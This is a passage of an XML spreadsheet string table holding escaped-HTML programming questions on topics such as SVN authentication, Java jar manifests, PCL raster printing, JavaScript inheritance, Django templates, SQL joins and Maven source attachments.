    <t xml:space="preserve">&lt;p&gt;We have a web application, which involves a lot of documents. In a typical use case, a document will be generated from our web application. The user download the generated document to the local file system and modify it. After this work, the user upload the modified document back to the web application. &lt;/p&gt;
&lt;p&gt;I need an easier way, to work with the web application and documents. It should be seamlessly. Maybe, there is a way, to edit the document in a webdav folder similar a sharepoint document list and store it right back in the web application, without storing a  temporary document on the local file system.&lt;/p&gt;
&lt;p&gt;But maybe, there are better ideas.&lt;/p&gt;
&lt;p&gt;P.S: I don't want to use active x controls and it must be a webapplication :-)&lt;/p&gt;
&lt;p&gt;Thank you for your help. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Installing SVN username password issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm installing SVN with Apache 2.2 on windows 2003 everything seems good but when I try to login no username/password works&lt;/p&gt;
&lt;p&gt;Here is some info&lt;br&gt;
I load this module in httpd.conf&lt;br&gt;
LoadModule auth_basic_module modules/mod_auth_basic.so&lt;br&gt;
&lt;br&gt;
and in svnserv.conf i have&lt;br&gt;
[general]&lt;br&gt;
anon-access=read&lt;br&gt;
auth-access=write&lt;br&gt;
&lt;br&gt;
password-db=passwd&lt;br&gt;
authz-db=authz&lt;br&gt;
&lt;br&gt;
in the passwd file&lt;br&gt;
[users]&lt;br&gt;
harry=harry&lt;br&gt;
sally=sally&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
what am I doing wrong or missign?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem running a Jar file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've compiled a java project into a Jar file, and am having issues running it.&lt;/p&gt;
&lt;p&gt;When I run:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java -jar myJar.jar
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get the following error&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Could not find the main class: myClass
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The class file is not in the root directory of the jar so I've tried changing the path of the main class to match the path to the class file and I get the same issue.&lt;/p&gt;
&lt;p&gt;Should I be flattening the file structure? if so how do I do this. I'm using Ant to build the Jar file if thats of any use.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;Here is the contents of the jar and the relevant Ant sections, I've changed the name of the firm I work for to "org":&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;META-INF/
META-INF/MANIFEST.MF
dataAccessLayer/
dataAccessLayer/databaseTest.class
org/
org/eventService/
org/eventService/DatabaseObject.class
org/eventService/DatabaseObjectFactory.class
org/eventService/DbEventClientImpl$HearBeatMonitor.class
org/eventService/DbEventClientImpl.class
org/eventService/EmptyQueryListException.class
org/eventService/EventHandlerWorkItem.class
org/eventService/EventProcessor.class
org/eventService/EventTypeEnum.class
org/eventService/EventWorkQueue$MonitorThread.class
org/eventService/EventWorkQueue$PoolWorker.class
org/eventService/EventWorkQueue.class
org/eventService/FailedToLoadDriverException.class
org/eventService/IConnectionFailureListener.class
org/eventService/InvalidEventTypeException.class
org/eventService/JdbcInterfaceConnection.class
org/eventService/NullArgumentException.class
org/eventService/OracleDatabaseObject.class
org/eventService/ProactiveClientEventLogger.class
org/eventService/ProactiveClientEventLoggerException.class
org/eventService/PropertyMap.class
org/eventService/SQLServerDatabaseObject.class
org/eventService/TestHarness.class
org/eventService/Utilities.class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the ant target:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;target name="compile" depends="init" description="compile the source "&amp;gt;
    &amp;lt;javac srcdir="src" destdir="bin" classpathref="project.class.path"/&amp;gt;
&amp;lt;/target&amp;gt;
&amp;lt;target name="buildjar" description="build jar file" depends="compile"&amp;gt;
    &amp;lt;mkdir dir="dist"/&amp;gt;
    &amp;lt;jar destfile="dist/myJar.jar" basedir="bin" includes="**/*.class" &amp;gt;
        &amp;lt;manifest&amp;gt;
            &amp;lt;attribute name="Main-Class" value="org.eventService.ProactiveClientEventLogger"/&amp;gt;
        &amp;lt;/manifest&amp;gt;
     &amp;lt;/jar&amp;gt;
&amp;lt;/target&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>nVidia SLI Tricks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm optimizing a directx graphics application to take advantage of nVidia's SLI technology.  I'm currently investigating some of the techniques mentioned in their 'Best Practices' web page, but wanted to know what advice/experience any of you have had with this?  &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PCL raster color graphics distorted. Code included: what am I missing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The function below prints a color raster image to a PCL-5 printer.  The function was adapted from a 2-color (1bpp) printing function we had that worked perfectly, except for the grainy 2-color printing.  The problem is that the image comes out with a large black bar extending from the right of the image to the edge of the page like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  IMAGE#########################################
  IMAGE#########AREA COMPLETELY BLACK###########
  IMAGE#########################################
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The image itself looks perfect, otherwise.   &lt;/p&gt;
&lt;p&gt;Various PCL-to-PDF tools don't show the image at all, which leads me to believe I've forgotten do to something.  Appropriate resets (\u001bE\u001b%-12345X) were sent before, and page-feeds after.&lt;/p&gt;
&lt;p&gt;Any PCL experts out there?  I've got the PCL 5 Color Technical Reference Manual, and it's gotten me this far.  This last thing is driving me crazy though.&lt;/p&gt;
&lt;p&gt;*Edit:
I now know what command is causing the problem, but I don't know why:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  stream("\u001b*r0F");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This should keep the image rotated along with the page (portrait, landscape).  If I remove this, the problem goes away.  I can compensate by rotating the bitmap beforehand, but I really want to know what caused this!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   static void PrintImage()
    {
        // Get an image into memory
        Image original = Image.FromFile("c:\\temp\\test.jpg");
        Bitmap newBitmap = new Bitmap(original, original.Width, original.Height);
        stream(String.Format("\u001b*p{0:d}x*p{1:d}Y", 1000, 1000));// Set cursor.
        stream("\u001b*t300R");                                     // 300 DPI
        stream(String.Format("\u001b*r{0:d}T", original.Height));   // Height
        stream(String.Format("\u001b*r{0:d}S", original.Width));    // Width
        stream("\u001b*r3U");      // 8-bit color palette
        stream("\u001b*r0F");      // Follow logical page layout (landscape, portrait, etc..)
        // Set palette depth, 3 bytes per pixel RGB
        stream("\u001b*v6W\u0000\u0003\u0000\u0008\u0008\u0008");  
        stream("\u001b*r1A");      // Start raster graphics
        stream("\u001b*b0M");      // Compression 0 = None, 1 = Run Length Encoding
        // Not fast, but fast enough.  
        List&amp;lt;byte&amp;gt; colors = new List&amp;lt;byte&amp;gt;();
        for (int y2 = 0; y2 &amp;lt; original.Height; y2++)
        {
            colors.Clear();
            for (int x2 = 0; x2 &amp;lt; original.Width; x2++)
            {
                Color c = newBitmap.GetPixel(x2, y2);
                colors.Add(c.R);
                colors.Add(c.G);
                colors.Add(c.B);
            }
            stream(String.Format("\u001b*b{0}W", colors.Count));     // Length of data to send
            streamBytes(colors.ToArray());                           // Binary data
        }
        stream("\u001b*rB");   // End raster graphics  (also tried *rC -- no effect)
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Lisp In A Box - Why is it starting a server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've decided to get back into LISP (haven't used it since my AI classes) to get more comfortable with functional programming in general, so I downloaded Lisp In A Box (which we actually used in a previous class) which comes with CLISP and Emacs.&lt;/p&gt;
&lt;p&gt;When I run it, it says:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Connected on port 1617. Take this REPL, brother, and may it serve you well.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What the? So I looked on the Lisp In A Box webpage more closely and found this:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;SLIME is an integrated development environment for Emacs which interfaces with a Common Lisp implementation over a network socket. Lots of information about SLIME can be found at the SLIME node on CLiki. The manual for SLIME is available in PDF format online. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I somewhat understand what SLIME is (some sort of extension to emacs, right?) But why in the world is a text editor starting its own server and connecting to it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Establish Inheritance Between Objects in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following code that creates two objects (ProfileManager and EmployerManager) where the object EmployerManager is supposed to inherit from the object ProfileManager. 
However, when I do alert(pm instanceof ProfileManager); it returns false.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function ProfileFactory(profileType) {
    switch(profileType)
    {
    	case 'employer':
    		return new EmployerManager();
    		break;
    }
}
function ProfileManager() {
    this.headerHTML = null;
    this.contentHTML = null;
    this.importantHTML = null;
    this.controller = null;
    this.actions = new Array();
    this.anchors = new Array();
}
ProfileManager.prototype.loadData = function(action, dao_id, toggleBack) {
    var step = this.actions.indexOf(action);
    var prv_div = $('div_' + step - 1);
    var nxt_div = $('div_' + step);
    new Ajax.Request(this.controller, {
    		method: 'get',
    		parameters: {action : this.actions[step], dao_id : dao_id},
    		onSuccess: function(data) {
    			nxt_div.innerHTML = data.responseText;
    			if(step != 1 &amp;amp;&amp;amp; !prv_div.empty()) {
    				prv_div.SlideUp();
    			}
    			nxt_div.SlideDown();
    			for(i = 1; i &amp;lt;= step; i++)
    			{
    				if($('step_anchor_' + i).innerHTML.empty())
    				{
    					$('step_anchor_' + i).innerHTML = this.anchors[i];
    				}
    			}
    		}
    	}
    )	
}
EmployerManager.prototype.superclass = ProfileManager;
function EmployerManager() {
    this.superclass();
    this.controller = 'eprofile.php';
    this.anchors[1] = 'Industries';
    this.anchors[2] = 'Employer Profiles';
    this.anchors[3] = 'Employer Profile';
    this.actions[1] = 'index';
    this.actions[2] = 'employer_list';
    this.actions[3] = 'employer_display';	
}
var pm = new ProfileFactory('employer');
alert(pm instanceof ProfileManager);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;BTW, this is my very first attempt at Object-Oriented JavaScript, so if you feel compelled to comment on the stupidity of my approach please feel free to do so, but offer suggestions on how to approach the problem better.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Communicating from website to desktop application (not vice-versa)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am designing an application that will have to react to certain website actions, mostly in the same way as the Last.FM client does.&lt;/p&gt;
&lt;p&gt;The way the Last.FM client works is that it first registers a custom protocol in Windows (&lt;code&gt;lastfm://&lt;/code&gt;) after which certain player actions can be triggered via the website by following the links using this protocol. For example, following&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;lastfm://artist//similarartists
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;will direct any Last.FM client running to load similar artists.&lt;/p&gt;
&lt;p&gt;I would like to implement something similar for my application with my own protocol and client.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is this a good idea general? &lt;/li&gt;
&lt;li&gt;Are there any good alternatives to this mechanism of notifying a desktop client from the website?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>inheritance from two parent classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I read about this ages ago but never tried it now I can't remember if this is possible or not. Is it possible to extend a class from two parents on php5 e.g.&lt;/p&gt;
&lt;p&gt;class_d extends class_c and class_b&lt;/p&gt;
&lt;p&gt;moreover can you do this if class_c and class_b are themselves extended from class_a ... so you get something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;                          class_a
                  class_b          class_c
                          class_d
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Declare-and-throw vs. throw-without-being-declared exceptions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Java, what is the difference between the twin methods?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void methodA() throws AnException {
    //do something
    throw new AnException();
}
public void methodA() {
    //do the same thing
    throw new AnException();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have a intuition that it has something to do with being a well-designed method (because I put methodA in an interface, declared it the way methodA* does in its implementation and received a warning from Java that "A* cannot override A because A* doesn't throw AnException"). &lt;/p&gt;
&lt;p&gt;Is this speculation correct? &lt;/p&gt;
&lt;p&gt;Is there any other subtle connotations in the two ways of doing things?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mapping a class with multiple collection properties containing the same object type</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our system generates emails with user-chosen lists of To / CC / BCC contacts.  I wanted to store them as follows in our SQL Server database, here's the simplified database table structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE [Contact] (
    [ContactID] [int] IDENTITY (1, 1) NOT NULL,
    [Name] [varchar] (100) NOT NULL,
    [EmailAddress] [varchar] (100) NOT NULL,
    CONSTRAINT [PK_Contact] PRIMARY KEY CLUSTERED ([ContactID])
)
CREATE TABLE [Email] (
    [EmailID] [int] IDENTITY (1, 1) NOT NULL,
    [Subject] [varchar] (500) NOT NULL,
    [Message] [text] NULL,
    [DateSent] [datetime] NOT NULL,
    CONSTRAINT [PK_Email] PRIMARY KEY CLUSTERED ([EmailID])
)
CREATE TABLE [EmailContact] (
    [EmailID] [int] NOT NULL,
    [ContactID] [int] NOT NULL,
    [Type] [varchar] (4) NOT NULL,
    CONSTRAINT [PK_EmailContactList] PRIMARY KEY CLUSTERED 
    (
    	[EmailID],
    	[ContactID],
    	[Type]
    ),
    CONSTRAINT [FK_EmailContact_Contact] FOREIGN KEY ([ContactID]) REFERENCES [Contact] ([ContactID]),
    CONSTRAINT [FK_EmailContact_Email] FOREIGN KEY ([EmailID]) REFERENCES [Email] ([EmailID])
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This to me looks like a case of a many-to-many relationship between the Email and Contact objects.  However, I would like the Email domain object to have 3 separate IList properties for the contacts of each list (To / CC / BCC) such that I could enable the following code to work :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;testEmail.ToContacts.Add(contact1)
testEmail.CCContacts.Add(contact2)
testEmail.BCCContacts.Add(contact3)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can this be done without adding an additional domain object (EmailContact)?  Do I need to use two many-to-one relationships with an additional domain object like &lt;a href="http://devlicio.us/blogs/billy_mccafferty/archive/2008/07/11/when-to-use-many-to-one-s-vs-many-to-many-with-nhibernate.aspx" rel="nofollow"&gt;Billy McCafferty mentions here&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;Also, how would I represent this my NHibernate mapping file?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom view transition in OpenGL ES</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a custom transition, to serve as a replacement for a default transition you would get here, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[self.navigationController pushViewController:someController animated:YES];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have prepared an OpenGL-based view that performs an effect on some static texture mapped to a plane (let's say it's a copy of the flip effect in Core Animation).  What I don't know how to do is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;grab current view content and make a texture out of it (I remember seeing a function that does just that, but can't find it)&lt;/li&gt;
&lt;li&gt;how to do the same for the view that is currently offscreen and is going to replace current view &lt;/li&gt;
&lt;li&gt;are there some APIs I can hook to in order to make my transition class as native as possible (make it a kind of Core Animation effect)?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any thoughts or links are greatly appreciated!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Jeffrey Forbes's answer works great as a solution to capture the content of a view.  &lt;/p&gt;
&lt;p&gt;What I haven't figured out yet is how to capture the content of the view I want to transition to, which should be invisible until the transition is done.&lt;/p&gt;
&lt;p&gt;Also, which method should I use to present the OpenGL view?
For demonstration purposes I used pushViewController.  That affects the navbar, though, which I actually want to go one item back, with animation, check this vid for explanation:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://vimeo.com/4649397"&gt;http://vimeo.com/4649397&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Another option would be to go with presentViewController, but that shows fullscreen.
Do you think maybe creating another window (or view?) could be useful?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SELECT with ORs including table joins</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a database with three tables: Books (with book details, PK is CopyID), Keywords (list of keywords, PK is ID) and KeywordsLink which is the many-many link table between Books and Keywords with the fields ID, BookID and KeywordID.&lt;/p&gt;
&lt;p&gt;I'm trying to make an advanced search form in my app where you can search on various criteria. At the moment I have it working with Title, Author and Publisher (all from the Book table). It produces SQL like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM Books WHERE Title Like '%Software%' OR Author LIKE '%Spolsky%';
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to extend this search to also search using tags - basically to add another OR clause to search the tags. I've tried to do this by doing the following&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT *
    FROM Books, Keywords, Keywordslink
    WHERE Title LIKE '%Joel%'
       OR (Name LIKE '%good%' AND BookID=Books.CopyID AND KeywordID=Keywords.ID)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I thought using the brackets might separate the 2nd part into its own kinda clause, so the join was only evaluated in that part - but it doesn't seem to be so. All it gives me is a long list of multiple copies of the one book that satisfies the &lt;code&gt;Title LIKE '%Joel%'&lt;/code&gt; bit.&lt;/p&gt;
&lt;p&gt;Is there a way of doing this using pure SQL, or would I have to use two SQL statements and combine them in my app (removing duplicates in the process).&lt;/p&gt;
&lt;p&gt;I'm using MySQL at the moment if that matters, but the app uses ODBC and I'm hoping to make it DB agnostic (might even use SQLite eventually or have it so the user can choose what DB to use).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>cfront for C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is a cfront tool available for the new C++? For any other modern languages?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there specific "technical debts" that are not worth incurring?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are (at least) two ways that technical debts make their way into projects. The first is by conscious decision. Some problems just are not worth tackling up front, so they are consciously allowed to accumulate as technical debt. The second is by ignorance. The people working on the project don't know or don't realize that they are incurring a technical debt. This question deals with the second. Are there technical debts that you let into your project that would have been trivial to keep out ("If I had only known...") but once they were embedded in the project, they became dramatically more costly? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Django, Problem with {{ block.super }}, How do I avoid duplicating a `block` in multiple template files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For 2 child template files inheriting a block, the &lt;code&gt;{{ block.super }}&lt;/code&gt; does not resolve&lt;/p&gt;
&lt;p&gt;Python 2.5.2, Django 1.0, Windows XP SP3&lt;/p&gt;
&lt;p&gt;Sample skeleton code for files involved:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;base.html&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;item_base.html&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;show_info_for_all_items.html&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;show_info_for_single_item.html&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;FILE : &lt;code&gt;base.html&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{% block content %}
{% endblock %}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;FILE : &lt;code&gt;item_base.html&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{% extends "base.html" %}
{% block item_info %}   
    Item : {{ item.name }}&amp;lt;br/&amp;gt;
    Price : {{ item.price }}&amp;lt;br/&amp;gt;	
{% endblock %}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;FILE : &lt;code&gt;show_info_for_all_items.html&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{% extends "item_base.html" %}
{% block content %}
    &amp;lt;h1&amp;gt;info on all items&amp;lt;/h1&amp;gt;
    &amp;lt;hr/&amp;gt;
    {% for item in items %}
    	{% block item_info %}
    		{{ block.super }}
    	{% endblock %}
    	&amp;lt;hr/&amp;gt;
    {% endfor %}
{% endblock %}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;FILE : &lt;code&gt;show_info_for_single_item.html&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{% extends "item_base.html" %}
{% block content %}
    &amp;lt;h1&amp;gt;info on single item&amp;lt;/h1&amp;gt;	
    {% block item_info %}
    	{{ block.super }}
    {% endblock %}	
{% endblock %}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;show_info_for_all_items.html&lt;/code&gt; shows a list of items along with each item's info.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;show_info_for_single_item.html&lt;/code&gt; shows a single item with the item's info.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;show_info_for_all_items.html&lt;/code&gt; and &lt;code&gt;show_info_for_single_item.html&lt;/code&gt; share same code for showing item info, so I moved it to &lt;code&gt;item_base.html&lt;/code&gt; into &lt;code&gt;block item_info&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;but the &lt;code&gt;{{ block.super }}&lt;/code&gt; in &lt;code&gt;show_info_for_all_items.html&lt;/code&gt; and &lt;code&gt;show_info_for_single_item.html&lt;/code&gt; does not work. &lt;code&gt;{{ block.super }}&lt;/code&gt; resolves as blank.&lt;/p&gt;
&lt;p&gt;If I move the code back from &lt;code&gt;block item_info&lt;/code&gt; in &lt;code&gt;item_base.html&lt;/code&gt; into &lt;code&gt;show_info_for_all_items.html&lt;/code&gt; and &lt;code&gt;show_info_for_single_item.html&lt;/code&gt;  it works but then I have to duplicate same &lt;code&gt;block item_info&lt;/code&gt; code in 2 files.&lt;/p&gt;
&lt;p&gt;If the block.super issue can not be solved, does Django offer something like INCLUDE =&gt; &lt;code&gt;{% INCLUDE "item_base.html" %}&lt;/code&gt; so blocks from a template file can be included ( instead of &lt;code&gt;extends&lt;/code&gt; )&lt;/p&gt;
&lt;p&gt;How do I avoid duplicating &lt;code&gt;block item_info&lt;/code&gt; in both html files?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is your employer comfortable with a hosted bug tracking solution, or it has to be inhouse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Was your employer comfortable with a hosted bug tracking solution, or it just had to be in house for security/paranoia reasons?&lt;/p&gt;
&lt;p&gt;I can see small teams of remote developers benefiting from it, but most bosses (i would think) would be to paranoid to let someone else know of their internals.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing Interface in a WCF Service?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm experimenting with WCF Services, and have come across a problem with passing Interfaces.&lt;/p&gt;
&lt;p&gt;This works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[ServiceContract]
public interface IHomeService
{
    [OperationContract]
    string GetString();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this doesn't:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[ServiceContract]
public interface IHomeService
{
    [OperationContract]
    IDevice GetInterface();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I try to compile the client it fails on the GetInterface method. I get an Exception saying that it can't convert Object to IDevice.&lt;/p&gt;
&lt;p&gt;On the clientside the IHomeService class correctly implements GetString with a string as it's returntype, but the GetInterface has a returntype of object. Why isn't it IDevice?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How is FlexBuilder compiling my app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to see the command-line arguments that FlexBuilder is using to compile my application. This is so that I can build them into the ANT script I'm working on. Is there any way to view the command line compilation step?&lt;/p&gt;
&lt;p&gt;The reason I'm asking for this is that when I compile my app using Ant/Flex SDK vs. FlexBuilder my app behaves differently.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Iterate over HashMap.values() in JSF+Facelets</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using JSF/Facelets, and I'm trying to iterate over some Document objects (custom object) that I'm keeping in a HashMap.  When the page is loaded, I'm getting the error "Property 'name' not found on type java.util.HashMap$Values".  Here's what's in my backing bean:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private Map&amp;lt;String, Document&amp;gt; documents = new HashMap&amp;lt;String, Document&amp;gt;();
public Collection&amp;lt;Document&amp;gt; getDocuments(){
    return documents.values();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And in my xhtml page:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;h:dataTable id="documentTable"
    value="#{DocumentManager.allDocuments}"
    var="doc" rowClasses="list-row-odd, list-row-even"
    headerClass="table-header" styleClass="bordered"&amp;gt;
    &amp;lt;h:column id="col_name"&amp;gt;
         &amp;lt;f:facet name="header"&amp;gt;Name&amp;lt;/f:facet&amp;gt;
         ${doc.name}
    &amp;lt;/h:column&amp;gt;
&amp;lt;/h:dataTable&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I change the getDocuments function to the following, it works (meaning the table is displayed without error), but I'm not sure why I need to put the values in the list for the JSF/Facelets page to display properly.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public List&amp;lt;Document&amp;gt; getDocuments(){
    List&amp;lt;Document&amp;gt; rtrn = new ArrayList&amp;lt;Document&amp;gt;();
    for(Document doc : documents.values())
        rtrn.add(doc);
    return rtrn;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Shouldn't I be able to iterate over the Collection?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JMS/DDS Integration</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a legacy C++ application that uses &lt;a href="http://portals.omg.org/dds" rel="nofollow"&gt;DDS&lt;/a&gt; for asynchronous communication/messaging.  I need to integrate this application into a JavaEE environment that uses JMS for messaging.  Other than building a standalone JMS/DDS bridge module, are there any other options that I might have?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practices for storing postal addresses in a database (RDBMS)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any good references for best practices for storing postal addresses in an RDBMS?  It seems there are lots of tradeoffs that can be made and lots of pros and cons to each to be evaluated -- surely this has been done time and time again?  Maybe someone has at least written done some lessons learned somewhere?&lt;/p&gt;
&lt;p&gt;Examples of the tradeoffs I am talking about are storing the zipcode as an integer vs a char field, should house number be stored as a separate field or part of address line 1, should suite/apartment/etc numbers be normalized or just stored as a chunk of text in address line 2, how do you handle zip +4 (separate fields or one big field, integer vs text)? etc. &lt;/p&gt;
&lt;p&gt;I'm primarily concerned with U.S. addresses at this point but I imagine there are some best practices in regards to preparing yourself for the eventuality of going global as well (e.g. naming fields appropriately like region instead of state or postal code instead of zip code, etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can i make a catch all route to handle '404 page not found' queries for ASP.NET MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to create a final route that catches all .. and bounces the user to a 404 view in ASP.NET MVC?&lt;/p&gt;
&lt;p&gt;NOTE: I don't want to set this up in my IIS settings.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Decode gzipped web page retrieved via cURL in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm retrieving a gzipped web page via curl, but when I output the retrieved content to the browser I just get the raw gzipped data. How can I decode the data in PHP?&lt;/p&gt;
&lt;p&gt;One method I found was to write the content to a tmp file and then ...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$f = gzopen($filename,"r");
$content = gzread($filename,250000);
gzclose($f);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;.... but man, there's got to be a better way.&lt;/p&gt;
&lt;p&gt;Edit: This isn't a file, but a gzipped html page returned by a web server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Batch Updates using DataAdapter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a situation where I have a bunch of SQL Update commands that all need to be executed.  I know that DataSets can do batch updates, but the only way I've been able to accomplish it is to load the whole table into a dataset first.  What if I want to only update a subset of the records in a table?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Meaning of exception in C# app: "Not a legal OleAut date"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know what this means. Getting this in C# winforms applications:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Not a legal OleAut date&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Get source jar files attached to Eclipse for Maven-managed dependencies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Maven (and the Maven Eclipse Integration) to manage the dependencies for my Java projects in Eclipse. The automatic download feature for JAR files from the Maven repositories is a real time saver. Unfortunately, it does not include API documentation and source code.&lt;/p&gt;
&lt;p&gt;How can I set up Maven to automatically also get the source and javadoc attachments and register them properly with Eclipse?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Algorithm: array of arrays in Cocoa Touch (perhaps using NSCountedSet)</t>
  </si>
  <si>
